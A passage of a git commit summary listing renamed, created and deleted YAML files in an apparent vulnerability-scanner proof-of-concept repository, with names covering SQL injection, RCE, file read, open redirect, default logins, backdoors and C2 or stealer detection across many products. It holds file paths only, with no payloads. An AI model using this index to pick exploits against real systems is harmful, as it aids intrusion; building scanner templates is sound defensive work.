poc/microsoft/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) rename poc/microsoft/{dotcms-admin-panel-7085.yaml => dotcms-admin-panel-7087.yaml} (100%) delete mode 100644 poc/microsoft/dotnetcms-sqli.yaml create mode 100644 poc/microsoft/duomicms-sql-injection-7124.yaml create mode 100644 poc/microsoft/duomicms-sql-injection.yaml rename poc/microsoft/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) delete mode 100644 poc/microsoft/empirecms-xss-7220.yaml delete mode 100644 poc/microsoft/ems-login-panel-7223.yaml delete mode 100644 poc/microsoft/feifeicms-lfr.yaml delete mode 100644 poc/microsoft/grav-cms-detect.yaml create mode 100644 poc/microsoft/isams-panel.yaml delete mode 100644 poc/microsoft/jeewms-lfi.yaml delete mode 100644 poc/microsoft/kevinlab-bems-sqli-8457.yaml delete mode 100644 poc/microsoft/kevinlab-hems-backdoor-8467.yaml delete mode 100644 poc/microsoft/lotuscms-rce-8650.yaml create mode 100644 poc/microsoft/lotuscms-rce-8652.yaml delete mode 100644 poc/microsoft/metatag-cms-8833.yaml create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8853.yaml create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8854.yaml delete mode 100644 poc/microsoft/microsoft-exchange-workflow-8855.yaml create mode 100644 poc/microsoft/microsoft-exchange-workflow.yaml delete mode 100644 poc/microsoft/ms-adcs-detect-8960.yaml create mode 100644 poc/microsoft/ms-adcs-detect-8961.yaml create mode 100644 poc/microsoft/msmtp-config-8967.yaml delete mode 100644 poc/microsoft/myucms-lfr-8985.yaml delete mode 100644 poc/microsoft/myucms-lfr-8987.yaml delete mode 100644 poc/microsoft/netlify-cms-9039.yaml create mode 100644 poc/microsoft/netlify-cms-9041.yaml delete mode 100644 poc/microsoft/octobercms-default-login-9192.yaml create mode 100644 poc/microsoft/octobercms-default-login.yaml delete mode 100644 poc/microsoft/octobercms-detect-9195.yaml create mode 100644 poc/microsoft/odoo-cms-redirect-9199.yaml delete mode 100644 poc/microsoft/pandora-fms-console-9451.yaml create mode 100644 poc/microsoft/pandora-fms-console-9453.yaml create mode 100644 poc/microsoft/pbootcms-database-file-download-9469.yaml delete mode 100644 poc/microsoft/plone-cms-detect-9607.yaml rename poc/microsoft/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%) create mode 100644 poc/microsoft/powercreator-cms-rce-9645.yaml create mode 100644 poc/microsoft/powercreator-cms-rce.yaml create mode 100644 poc/microsoft/quick-cms-sqli.yaml create mode 100644 poc/microsoft/rhymix-cms-detect-9878.yaml delete mode 100644 poc/microsoft/saferoads-vms-login-9971.yaml create mode 100644 poc/microsoft/saferoads-vms-login-9973.yaml create mode 100644 poc/microsoft/samsung-wlan-ap-lfi-10000.yaml delete mode 100644 poc/microsoft/samsung-wlan-ap-lfi-9999.yaml create mode 100644 poc/microsoft/samsung-wlan-ap-xss-10012.yaml delete mode 100644 poc/microsoft/samsung-wlan-ap-xss.yaml create mode 100644 poc/microsoft/samsung-wlan-default-login-10018.yaml create mode 100644 poc/microsoft/seacms-rce-10101.yaml create mode 100644 poc/microsoft/seacms-sqli-10103.yaml create mode 100644 poc/microsoft/seeddms-detect-10131.yaml delete mode 100644 poc/microsoft/sevone-nms-network-manager.yaml create mode 100644 poc/microsoft/tikiwiki-cms-10773.yaml delete mode 100644 poc/microsoft/tikiwiki-cms-10775.yaml create mode 100644 poc/microsoft/top-xss-params-10807.yaml delete mode 100644 poc/microsoft/top-xss-params-10809.yaml create mode 100644 poc/microsoft/vpms-auth-bypass-11066.yaml delete mode 100644 poc/microsoft/vpms-auth-bypass-11068.yaml rename poc/microsoft/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%) create mode 100644 poc/microsoft/wondercms-detect-11222.yaml delete mode 100644 poc/microsoft/wondercms-detect.yaml create mode 100644 poc/microsoft/wp-arforms-listing-11415.yaml create mode 100644 poc/microsoft/wp-mstore-plugin-listing-11500.yaml rename poc/microsoft/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%) create mode 100644 poc/microsoft/wuzhicms-detect-11654.yaml create mode 100644 poc/microsoft/wuzhicms-detect.yaml delete mode 100644 poc/microsoft/xdcms-sqli-11664.yaml delete mode 100644 poc/microsoft/zcms-v3-sqli-11773.yaml create mode 100644 poc/microsoft/zms-auth-bypass-11830.yaml delete mode 100644 poc/microsoft/zms-auth-bypass-11832.yaml create mode 100644 poc/mongodb/alibaba-mongoshake-unauth-268.yaml create mode 100644 poc/mongodb/mongodb-detect-8920.yaml delete mode 100644 poc/mongodb/mongodb-unauth-8925.yaml create mode 100644 poc/mongodb/rockmongo-default-login-9897.yaml delete mode 100644 poc/mongodb/rockmongo-xss-9902.yaml create mode 100644 poc/mongodb/unauthenticated-mongo-express.yaml delete mode 100644 poc/netlify/api-netlify-470.yaml create mode 100644 poc/netlify/api-netlify.yaml delete mode 100644 poc/netlify/netlify-cms-9039.yaml create mode 100644 poc/netlify/netlify-cms-9041.yaml create mode 100644 poc/nginx/default-nginx-page-6881.yaml rename poc/nginx/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/nginx/git-config-nginxoffbyslash-7630.yaml rename poc/nginx/{nginx-config.yaml => nginx-config-9099.yaml} (100%) delete mode 100644 poc/nginx/nginx-linux-page-9102.yaml delete mode 100644 poc/nginx/nginx-linux-page.yaml delete mode 100644 poc/nginx/nginx-version-9122.yaml create mode 100644 poc/nginx/nginx-version-9123.yaml delete mode 100644 poc/nodejs/kube-api-nodes-8508.yaml delete mode 100644 poc/nodejs/kube-api-nodes.yaml delete mode 100644 poc/nodejs/lfr_express.yaml create mode 100644 poc/nodejs/node-ecstatic-listing.yaml create mode 100644 poc/nodejs/node-integration-enabled-9136.yaml delete mode 100644 poc/nodejs/node-integration-enabled-9137.yaml delete mode 100644 poc/nodejs/puppet-node-manager-detect-9720.yaml create mode 100644 poc/nodejs/puppet-node-manager-detect.yaml create mode 100644 poc/nodejs/unauthenticated-mongo-express.yaml create mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/open_redirect/age-gate-open-redirect-207.yaml create mode 100644 poc/open_redirect/age-gate-open-redirect.yaml delete mode 100644 poc/open_redirect/attitude-theme-open-redirect.yaml create mode 100644 poc/open_redirect/aws-redirect-651.yaml delete mode 100644 poc/open_redirect/brandfolder-open-redirect-779.yaml create mode 100644 poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml delete mode 100644 poc/open_redirect/eatery-restaurant-open-redirect.yaml delete mode 100644 poc/open_redirect/homeautomation-v3-openredirect-7985.yaml delete mode 100644 poc/open_redirect/httpbin-open-redirect.yaml create mode 100644 poc/open_redirect/music-store-open-redirect.yaml delete mode 100644 poc/open_redirect/newsletter-open-redirect.yaml create mode 100644 poc/open_redirect/odoo-cms-redirect-9199.yaml delete mode 100644 poc/open_redirect/office365-open-redirect-9215.yaml delete mode 100644 poc/open_redirect/otobo-open-redirect-9409.yaml delete mode 100644 poc/open_redirect/pieregister-plugin-open-redirect.yaml create mode 100644 poc/open_redirect/pollbot-redirect-9622.yaml delete mode 100644 poc/open_redirect/sap-redirect.yaml delete mode 100644 poc/open_redirect/ultimatemember-open-redirect-10877.yaml delete mode 100644 poc/open_redirect/weekender-newspaper-open-redirect.yaml delete mode 100644 poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml rename poc/open_redirect/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) create mode 100644 poc/open_redirect/wp-grimag-open-redirect-11458.yaml rename poc/open_redirect/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%) delete mode 100644 poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml delete mode 100644 poc/open_redirect/wp-prostore-open-redirect-11546.yaml create mode 100644 poc/open_redirect/wp-prostore-open-redirect-11550.yaml create mode 100644 poc/open_redirect/wptouch-open-redirect-11592.yaml create mode 100644 poc/oracle/metadata-oracle-8829.yaml delete mode 100644 poc/oracle/metadata-oracle.yaml delete mode 100644 poc/oracle/oracle-business-control-9347.yaml delete mode 100644 poc/oracle/oracle-dbass-detect-9351.yaml delete mode 100644 poc/oracle/oracle-dbass-detect.yaml delete mode 100644 poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml create mode 100644 poc/oracle/oracle-ebs-xss-9373.yaml delete mode 100644 poc/oracle/oracle-ebs-xss-9376.yaml create mode 100644 poc/oracle/oracle-http-server-12c-9384.yaml delete mode 100644 poc/oracle/oracle-integrated-manager-9386.yaml create mode 100644 poc/oracle/oracle-iplanet-web-server-9392.yaml delete mode 100644 poc/oracle/oracle-iplanet-web-server.yaml create mode 100644 poc/oracle/oracle-opera-login.yaml delete mode 100644 poc/oracle/oracle-people-enterprise-9394.yaml create mode 100644 poc/other/LayerSlider-plugin.yaml delete mode 100644 poc/other/X-Remote-IP.yaml create mode 100644 poc/other/acenet-panel.yaml delete mode 100644 poc/other/activemq-panel-49.yaml create mode 100644 poc/other/activemq-panel-53.yaml rename poc/other/{acunetix-panel.yaml => acunetix-panel-56.yaml} (100%) rename poc/other/{acunetix-panel-54.yaml => acunetix-panel-58.yaml} (100%) delete mode 100644 poc/other/adminer-panel-74.yaml create mode 100644 poc/other/adminer-panel-77.yaml create mode 100644 poc/other/adminset-panel-79.yaml delete mode 100644 poc/other/adminset-panel-80.yaml create mode 100644 poc/other/advance-setup-119.yaml delete mode 100644 poc/other/akamai-cloudtest-253.yaml delete mode 100644 poc/other/alibaba-canal-info-leak-266.yaml create mode 100644 poc/other/alienvault-usm-271.yaml delete mode 100644 poc/other/ampps-admin-panel-305.yaml create mode 100644 poc/other/ampps-admin-panel-306.yaml rename poc/other/{ampps-dirlisting.yaml => ampps-dirlisting-307.yaml} (100%) create mode 100644 poc/other/ampps-panel-310.yaml create mode 100644 poc/other/ansible-semaphore-panel.yaml delete mode 100644 poc/other/antsword-backdoor-333.yaml create mode 100644 poc/other/antsword-backdoor.yaml delete mode 100644 poc/other/artifactory-anonymous-deploy-549.yaml create mode 100644 poc/other/aspose-file-download-558.yaml delete mode 100644 poc/other/aspose-pdf-file-download.yaml create mode 100644 poc/other/aspose-words-file-download-571.yaml create mode 100644 poc/other/audiobookshelf-panel.yaml delete mode 100644 poc/other/automation-direct-597.yaml delete mode 100644 poc/other/axis-happyaxis-670.yaml create mode 100644 poc/other/axis-happyaxis.yaml rename poc/other/{barracuda-panel-685.yaml => barracuda-panel.yaml} (100%) rename poc/other/{basic-dns-example.yaml => basic.yaml} (100%) create mode 100644 poc/other/beyondtrust-panel-720.yaml delete mode 100644 poc/other/bigip.yaml create mode 100644 poc/other/bitrix-panel-748.yaml delete mode 100644 poc/other/bitrix-panel-750.yaml rename poc/other/{bookstack-panel-767.yaml => bookstack-panel-766.yaml} (100%) delete mode 100644 poc/other/buddy-panel-797.yaml create mode 100644 poc/other/buddy-panel.yml rename poc/other/{cacti-panel-829.yaml => cacti-panel-828.yaml} (100%) create mode 100644 poc/other/cacti-weathermap-file-write-832.yaml delete mode 100644 poc/other/cacti-weathermap-file-write-833.yaml delete mode 100644 poc/other/campaignmonitor-841.yaml create mode 100644 poc/other/campaignmonitor-842.yaml create mode 100644 poc/other/can-i-take-over-dns-852.yaml delete mode 100644 poc/other/cerebro-panel-878.yaml create mode 100644 poc/other/cerebro-panel-881.yaml delete mode 100644 poc/other/certificate-validation-882.yaml create mode 100644 poc/other/certificate-validation-884.yaml create mode 100644 poc/other/cgi-printenv.yaml rename poc/other/{cgi-test-page-888.yaml => cgi-test-page-887.yaml} (100%) delete mode 100644 poc/other/checkpoint-panel-898.yaml create mode 100644 poc/other/circarlife-setup-918.yaml delete mode 100644 poc/other/circarlife-setup-920.yaml create mode 100644 poc/other/citrix-oob-memory-read.yaml rename poc/other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%) rename poc/other/{clientaccesspolicy-1007.yaml => clientaccesspolicy-1005.yaml} (100%) delete mode 100644 poc/other/cofense-vision-panel-1141.yaml create mode 100644 poc/other/cofense-vision-panel-1142.yaml delete mode 100644 poc/other/contact-form-7.yaml create mode 100644 poc/other/crossdomain-xml-1267.yaml create mode 100644 poc/other/csod-panel-1286.yaml create mode 100644 poc/other/custom_nuclei-3.yaml create mode 100644 poc/other/d-link-arbitary-fileread-7043.yaml delete mode 100644 poc/other/d-link-arbitary-fileread-7044.yaml delete mode 100644 poc/other/d-link-wireless-7047.yaml delete mode 100644 poc/other/dead-host-with-cname-6786.yaml create mode 100644 poc/other/deimos-c2.yaml delete mode 100644 poc/other/development-logs-6989.yaml rename poc/other/{diaowen-fileread(1).yaml => diaowen-fileread.yaml} (100%) create mode 100644 poc/other/dir-listing-7003.yaml create mode 100644 poc/other/dlink-850l-info-leak-7035.yaml create mode 100644 poc/other/dlink-850l-info-leak-7039.yaml mode change 100755 => 100644 poc/other/dlink-file-read.yaml delete mode 100644 poc/other/dokuwiki-panel.yaml create mode 100644 poc/other/drone-ci-panel-7091.yaml create mode 100644 poc/other/druid-monitor-7102.yaml delete mode 100644 poc/other/druid-monitor-7103.yaml create mode 100644 poc/other/ds-store-file.yaml create mode 100644 poc/other/dss-download-fileread.yaml delete mode 100644 poc/other/dxplanning-panel.yaml rename poc/other/{dynamic-broadcast-receiver-7140.yaml => dynamic-broadcast-receiver-7141.yaml} (100%) create mode 100644 poc/other/easy-media-gallery-pro-listing-7152.yaml rename poc/other/{Bitrix_check_env.yaml => env.yaml} (100%) delete mode 100644 poc/other/envision-gateway.yaml create mode 100644 poc/other/error-logs-7255.yaml create mode 100644 poc/other/f-secure-policy-manager-7560.yaml rename poc/other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel-7435.yaml} (100%) rename poc/other/{file-scheme-7468.yaml => file-scheme-7467.yaml} (100%) create mode 100644 poc/other/filezilla-7470.yaml create mode 100644 poc/other/formula.yaml delete mode 100644 poc/other/fortinet-fortigate-panel-7536.yaml delete mode 100644 poc/other/foulenzer-subdomain-tk (copy 1).yaml delete mode 100644 poc/other/gespage-panel-7605.yaml create mode 100644 poc/other/gespage-panel-7606.yaml delete mode 100644 poc/other/globalprotect-panel-7720.yaml delete mode 100644 poc/other/glpi-directory-listing-7734.yaml create mode 100644 poc/other/glpi-directory-listing.yaml delete mode 100644 poc/other/glpidirectorylisting(1).yaml create mode 100644 poc/other/gogs-workflow-7760.yaml delete mode 100644 poc/other/gogs-workflow.yaml create mode 100644 poc/other/goodjob-dashboard.yaml delete mode 100644 poc/other/h2console-panel-7866.yaml delete mode 100644 poc/other/hack5-cloud-c2.yaml create mode 100644 poc/other/haivision-gateway-panel.yaml delete mode 100644 poc/other/hanming-lfr.yaml rename poc/other/{harbor-workflow-7889.yaml => harbor-workflow.yaml} (100%) delete mode 100644 poc/other/heatmiser-wifi-thermostat.yaml delete mode 100644 poc/other/hikvision-info-leak-7958.yaml create mode 100644 poc/other/hikvision-info-leak.yaml create mode 100644 poc/other/hitron-technologies-7961.yaml delete mode 100644 poc/other/hitron-technologies-7962.yaml delete mode 100644 poc/other/hjtcloud-arbitrary-file-read-7967.yaml rename poc/other/{hjtcloud-rest-arbitrary-file-read-7973.yaml => hjtcloud-rest-arbitrary-file-read.yaml} (100%) delete mode 100644 poc/other/hmc-hybris-panel-7977.yaml create mode 100644 poc/other/hmc-hybris-panel-7978.yaml create mode 100644 poc/other/honeywell-building-control-7987.yaml delete mode 100644 poc/other/honeywell-building-control-7988.yaml rename poc/other/{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} (100%) create mode 100644 poc/other/hp-ilo-5-8020.yaml delete mode 100644 poc/other/hp-service-manager-8032.yaml create mode 100644 poc/other/hp-service-manager-8034.yaml delete mode 100644 poc/other/hpe-system-management-anonymous-8013.yaml delete mode 100644 poc/other/huawei-hg532e-panel-8066.yaml create mode 100644 poc/other/huijietong-cloud-fileread.yaml delete mode 100644 poc/other/identity-services-engine-8146.yaml delete mode 100644 poc/other/identityguard-selfservice-entrust-8142.yaml delete mode 100644 poc/other/immich-panel.yaml delete mode 100644 poc/other/interactsh-server-8165.yaml create mode 100644 poc/other/interactsh-server.yaml create mode 100644 poc/other/internet-service-8178.yaml delete mode 100644 poc/other/internet-service.yaml rename poc/other/{ioncube-loader-wizard-8184.yaml => ioncube-loader-wizard.yaml} (100%) rename poc/other/{itop-panel-8204.yaml => itop-panel-8205.yaml} (100%) delete mode 100644 poc/other/jamf-panel-8216.yaml delete mode 100644 poc/other/jfrog-8306.yaml delete mode 100644 poc/other/jkstatus-manager-8344.yaml create mode 100644 poc/other/jmx-console-8351.yaml delete mode 100644 poc/other/jmx-console-8352.yaml rename poc/other/{jolokia-8367.yaml => jolokia-8369.yaml} (100%) delete mode 100644 poc/other/jolokia-list-8360.yaml create mode 100644 poc/other/jolokia-list-8361.yaml create mode 100644 poc/other/kingsoft-v8-file-read.yaml create mode 100644 poc/other/kubelet-healthz.yaml create mode 100644 poc/other/kubelet-pods-8523.yaml rename poc/other/{landray-oa-fileread-8570.yaml => landray-oa-fileread-8571.yaml} (100%) create mode 100644 poc/other/liveview-axis-camera-8648.yaml delete mode 100644 poc/other/lockself-panel.yaml delete mode 100644 poc/other/lotus-domino-version-8657.yaml create mode 100644 poc/other/lotus-domino-version.yaml rename poc/other/{lucee-stack-trace-8669.yaml => lucee-stack-trace-8668.yaml} (100%) create mode 100644 poc/other/manageengine-adaudit-8730.yaml delete mode 100644 poc/other/manageengine-apex-helpdesk-8746.yaml create mode 100644 poc/other/manageengine-apex-helpdesk-8748.yaml delete mode 100644 poc/other/manageengine-applications-manager-8751.yaml create mode 100644 poc/other/manageengine-applications-manager-8753.yaml delete mode 100644 poc/other/manageengine-assetexplorer-8758.yaml delete mode 100644 poc/other/manageengine-desktop-8763.yaml create mode 100644 poc/other/manageengine-opmanager-8767.yaml delete mode 100644 poc/other/manageengine-opmanager-8768.yaml rename poc/other/{manageengine-servicedesk-8772.yaml => manageengine-servicedesk-8771.yaml} (100%) delete mode 100644 poc/other/manageengine-supportcenter-8777.yaml rename poc/other/{get.yaml => match-1.yaml} (100%) rename poc/other/{matcher-with-or.yaml => matcher-with-and.yaml} (100%) delete mode 100644 poc/other/meduza-stealer.yaml create mode 100644 poc/other/metadata-alibaba-8807.yaml delete mode 100644 poc/other/metadata-azure-8813.yaml create mode 100644 poc/other/metadata-azure.yaml create mode 100644 poc/other/metadata-hetzner-8822.yaml mode change 100644 => 100755 poc/other/metadata-service-alibaba.yaml delete mode 100644 poc/other/mikrotik-graph-8870.yaml create mode 100644 poc/other/mikrotik-graph-8871.yaml create mode 100644 poc/other/mini-start-page-8895.yaml delete mode 100644 poc/other/mini-start-page-8896.yaml create mode 100644 poc/other/mobileiron-sentry.yaml delete mode 100644 poc/other/mobotix-guest-camera-8910.yaml create mode 100644 poc/other/moodle-workplace-panel.yaml create mode 100644 poc/other/mx-fingerprint.yaml create mode 100644 poc/other/mystic-stealer.yaml create mode 100644 poc/other/nameserver-fingerprint.yaml delete mode 100644 poc/other/navicat-server-panel.yaml rename poc/other/{nessus-panel-9020.yaml => nessus-panel-9017.yaml} (100%) create mode 100644 poc/other/netis-info-leak.yaml delete mode 100644 poc/other/netscaler-gateway-9052.yaml create mode 100644 poc/other/nextcloud-install-9084.yaml delete mode 100644 poc/other/nextcloud-install-9085.yaml create mode 100644 poc/other/nexus-panel.yaml delete mode 100644 poc/other/nh-c2.yaml delete mode 100644 poc/other/ns-asg-file-read-9153.yaml delete mode 100644 poc/other/ns-asg-file-read.yaml create mode 100644 poc/other/oki-data-9223.yaml delete mode 100644 poc/other/oki-data-9226.yaml create mode 100644 poc/other/okiko-sfiler-portal-9227.yaml rename poc/other/{okta-panel-9231.yaml => okta-panel-9234.yaml} (100%) delete mode 100644 poc/other/old-copyright-9237.yaml create mode 100644 poc/other/oob-param-based-interaction-9252.yaml delete mode 100644 poc/other/oob-param-based-interaction.yaml delete mode 100644 poc/other/open-mjpg-streamer-9284.yaml delete mode 100644 poc/other/open-proxy-internal-9289.yaml create mode 100644 poc/other/open-proxy-internal-9290.yaml create mode 100644 poc/other/open-proxy-portscan-9295.yaml create mode 100644 poc/other/open-virtualization-manager-panel-9328.yaml create mode 100644 poc/other/openam-workflow.yaml create mode 100644 poc/other/opensis-workflow-9318.yaml rename poc/other/{opensis-workflow-9319.yaml => opensis-workflow.yaml} (100%) delete mode 100644 poc/other/opentouch-multimediaservices-panel.yaml create mode 100644 poc/other/overseerr-panel.yaml delete mode 100644 poc/other/pacs-connexion-utilisateur-9425.yaml create mode 100644 poc/other/pagespeed-global-admin-9433.yaml delete mode 100644 poc/other/pagespeed-global-admin-9435.yaml delete mode 100644 poc/other/pahtool-panel.yaml create mode 100644 poc/other/panabit-panel-9444.yaml delete mode 100644 poc/other/panabit-panel-9445.yaml delete mode 100644 poc/other/panasonic-network-management-9447.yaml create mode 100644 poc/other/panasonic-network-management-9448.yaml create mode 100644 poc/other/passbolt-panel.yaml create mode 100644 poc/other/pdi-device-page.yaml rename poc/other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%) create mode 100644 poc/other/plausible-panel.yaml delete mode 100644 poc/other/plesk-obsidian-9594.yaml rename poc/other/{plesk-onyx-9598.yaml => plesk-onyx-9601.yaml} (100%) delete mode 100644 poc/other/plesk-stat-9604.yaml create mode 100644 poc/other/plesk-stat.yaml create mode 100644 poc/other/plugin.yaml rename poc/other/{portainer-init-deploy-9630.yaml => portainer-init-deploy.yaml} (100%) delete mode 100644 poc/other/posteio-admin-panel.yaml delete mode 100644 poc/other/postmessage-outgoing-tracker-9634.yaml create mode 100644 poc/other/postmessage-outgoing-tracker.yaml delete mode 100644 poc/other/powerlogic-ion-9648.yaml create mode 100644 poc/other/powerlogic-ion-9650.yaml rename poc/other/{prometheus-exporter-9678.yaml => prometheus-exporter-9677.yaml} (100%) create mode 100644 poc/other/prometheus-exporter.yaml create mode 100644 poc/other/prometheus-flags-9687.yaml delete mode 100644 poc/other/prometheus-flags.yaml delete mode 100644 poc/other/prometheus-targets-9691.yaml create mode 100644 poc/other/prototype-pollution-check-9698.yaml delete mode 100644 poc/other/prototype-pollution-check-9699.yaml rename poc/other/{provider-path-9702.yaml => provider-path-9701.yaml} (100%) create mode 100644 poc/other/ptr-fingerprint.yaml create mode 100644 poc/other/pulse-secure-panel-9712.yaml rename poc/other/{put-m-enb.yaml => put-method-enabled-9727.yaml} (100%) delete mode 100644 poc/other/put-method-enabled.yaml create mode 100644 poc/other/pypicloud-panel-9733.yaml create mode 100644 poc/other/qdpm-info-leak-9753.yaml create mode 100644 poc/other/qdpm-info-leak.yaml rename poc/other/{race-multiple.yaml => race-simple.yaml} (100%) create mode 100644 poc/other/radius-manager-9794.yaml delete mode 100644 poc/other/radius-manager-9796.yaml rename poc/other/{get-override-sni.yaml => raw-get.yaml} (100%) create mode 100644 poc/other/red-lion-panel.yaml create mode 100644 poc/other/request-based-interaction-9862.yaml rename poc/other/{request-based-interaction-9863.yaml => request-based-interaction.yaml} (100%) delete mode 100644 poc/other/resin-inputfile-fileread-9868.yaml create mode 100644 poc/other/resin-inputfile-fileread-9870.yaml create mode 100644 poc/other/resin-viewfile-lfr.yaml create mode 100644 poc/other/robots-txt-9888.yaml delete mode 100644 poc/other/robots-txt-9890.yaml create mode 100644 poc/other/ruijie-eg-filedown.yaml rename poc/other/{scs-landfill-control-10098.yaml => scs-landfill-control-10097.yaml} (100%) delete mode 100644 poc/other/securenvoy-panel-10114.yaml create mode 100644 poc/other/securenvoy-panel-10116.yaml delete mode 100644 poc/other/securepoint-utm-10117.yaml create mode 100644 poc/other/securepoint-utm-10118.yaml delete mode 100644 poc/other/security-10123.yaml create mode 100644 poc/other/security-10124.yaml delete mode 100644 poc/other/selea-ip-camera-10136.yaml create mode 100644 poc/other/selfcheck-panel.yaml delete mode 100644 poc/other/server-status-localhost-10165.yaml create mode 100644 poc/other/server-status-localhost-10166.yaml rename poc/other/{shell-history-10193.yaml => shell-history.yaml} (100%) delete mode 100644 poc/other/sidekiq-dashboard-10235.yaml create mode 100644 poc/other/sidekiq-dashboard-10239.yaml create mode 100644 poc/other/signatures-10268.yaml delete mode 100644 poc/other/sitemap.yaml rename poc/other/{skycaiji-admin-panel-10304.yaml => skycaiji-admin-panel-10306.yaml} (100%) delete mode 100644 poc/other/softether-vpn-panel.yaml create mode 100644 poc/other/solarwinds-orion-10357.yaml delete mode 100644 poc/other/solarwinds-orion-10359.yaml create mode 100644 poc/other/solr-fileread.yaml create mode 100644 poc/other/solr-query-dashboard-10368.yaml delete mode 100644 poc/other/solr-query-dashboard.yaml rename poc/other/{sonarqube-public-projects-10379.yaml => sonarqube-public-projects-10377.yaml} (100%) rename poc/other/{sonicwall-sslvpn-panel-10390.yaml => sonicwall-sslvpn-panel-10388.yaml} (100%) create mode 100644 poc/other/sonicwall-sslvpn-shellshock-10395.yaml create mode 100644 poc/other/sphinxonline-panel.yaml delete mode 100644 poc/other/spidercontrol-scada-server-info-10413.yaml delete mode 100644 poc/other/splunk-enterprise-panel-10415.yaml create mode 100644 poc/other/spoofable-spf-records-ptr-10424.yaml delete mode 100644 poc/other/spoofable-spf-records-ptr-10425.yaml delete mode 100644 poc/other/supershell-c2.yaml delete mode 100644 poc/other/supervpn-panel-10577.yaml delete mode 100644 poc/other/symantec-messaging-gateway-10610.yaml create mode 100644 poc/other/symantec-pgp-global-directory-10611.yaml delete mode 100644 poc/other/synopsys-coverity-panel.yaml create mode 100644 poc/other/tabnabbing-check-10646.yaml delete mode 100644 poc/other/teamcity-registration-enabled-10667.yaml create mode 100644 poc/other/teamcity-registration-enabled.yaml create mode 100644 poc/other/teamforge-panel.yaml create mode 100644 poc/other/tekon-info-leak-10685.yaml delete mode 100644 poc/other/teradici-pcoip.yaml delete mode 100644 poc/other/terraform-enterprise-panel-10710.yaml create mode 100644 poc/other/terraform-enterprise-panel-10711.yaml delete mode 100644 poc/other/thinkcmf-arbitrary-code-execution-10715.yaml create mode 100644 poc/other/thinkcmf-arbitrary-code-execution.yaml delete mode 100644 poc/other/thinkcmf_include.yaml create mode 100644 poc/other/tibco-spotfire-panel.yaml create mode 100644 poc/other/tigase-xmpp-server.yaml create mode 100644 poc/other/tileserver-gl.yaml delete mode 100644 poc/other/tor-socks-proxy-10811.yaml delete mode 100644 poc/other/traefik-dashboard-10832.yaml create mode 100644 poc/other/traefik-dashboard-10834.yaml create mode 100644 poc/other/tuxedo-connected-controller-10852.yaml delete mode 100644 poc/other/tuxedo-connected-controller-10855.yaml delete mode 100644 poc/other/upnp-device-10982.yaml delete mode 100644 poc/other/ups-status-10983.yaml create mode 100644 poc/other/ups-status-10985.yaml delete mode 100644 poc/other/veriz0wn-osint.yaml rename poc/other/{voipmonitor-workflow-11065.yaml => voipmonitor-workflow-11064.yaml} (100%) delete mode 100644 poc/other/voipmonitor-workflow.yaml delete mode 100644 poc/other/wallix-accessmanager-panel-11094.yaml create mode 100644 poc/other/wallix-accessmanager-panel-11095.yaml delete mode 100644 poc/other/wazuh-panel-11113.yaml create mode 100644 poc/other/wazuh-panel-11114.yaml rename poc/other/{wireless-leakage(1).yaml => wireless-leakage.yaml} (100%) create mode 100644 poc/other/wooyun-2015-148227(1).yaml delete mode 100644 poc/other/workspace-one-uem-11393.yaml create mode 100644 poc/other/workspace-one-uem-11394.yaml delete mode 100644 poc/other/wowza-streaming-engine-11399.yaml delete mode 100644 poc/other/wso2-2019-0598-11635.yaml delete mode 100644 poc/other/wso2-management-console-11644.yaml create mode 100644 poc/other/wso2-management-console-11647.yaml rename poc/other/{wso2mgmtconsole(1).yaml => wso2mgmtconsole.yaml} (100%) create mode 100644 poc/other/yarn-lock.yaml create mode 100644 poc/other/yongyou-eltextfile.yaml delete mode 100644 poc/other/yopass-panel-11749.yaml create mode 100644 poc/other/yopass-panel-11750.yaml create mode 100644 poc/other/zhiyuan-oa-info-leak-11799.yaml delete mode 100644 poc/other/zhiyuan-oa-info-leak-11800.yaml create mode 100644 poc/other/zhongkewangwei-fileread.yaml create mode 100644 poc/other/zuul-panel-11843.yaml create mode 100644 poc/perl/perl-status-9487.yaml create mode 100644 poc/php/clockwork-php-page-1016.yaml rename poc/php/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) delete mode 100644 poc/php/php-errors-9511.yaml delete mode 100644 poc/php/php-errors.yaml delete mode 100644 poc/php/php-proxy-detect.yaml create mode 100644 poc/php/php-scanner.yaml rename poc/php/{php-zerodium-backdoor-rce-9569.yaml => php-zerodium-backdoor-rce-9572.yaml} (100%) delete mode 100644 poc/php/php-zerodium-backdoor-rce.yaml create mode 100644 poc/php/phpcollab-detect-9499.yaml create mode 100644 poc/php/phpcollab-workflow-9502.yaml delete mode 100644 poc/php/phpcollab-workflow-9503.yaml delete mode 100644 poc/php/phpinfo-9520.yaml create mode 100644 poc/php/phpldapadmin-panel.yaml delete mode 100644 poc/php/phpmyadmin-setup-9531.yaml create mode 100644 poc/php/phpmyadmin-setup-9532.yaml delete mode 100644 poc/php/phpmyadmin-sql-9534.yaml create mode 100644 poc/php/phpunit-9556.yaml delete mode 100644 poc/php/phpunit.yaml delete mode 100644 poc/php/thinkphp-2-rce-10740.yaml delete mode 100644 poc/php/thinkphp-501-rce-10743.yaml create mode 100644 poc/php/thinkphp-501-rce.yaml create mode 100644 poc/php/thinkphp-5022-rce-10744.yaml rename poc/php/{thinkphp-5022-rce.yaml => 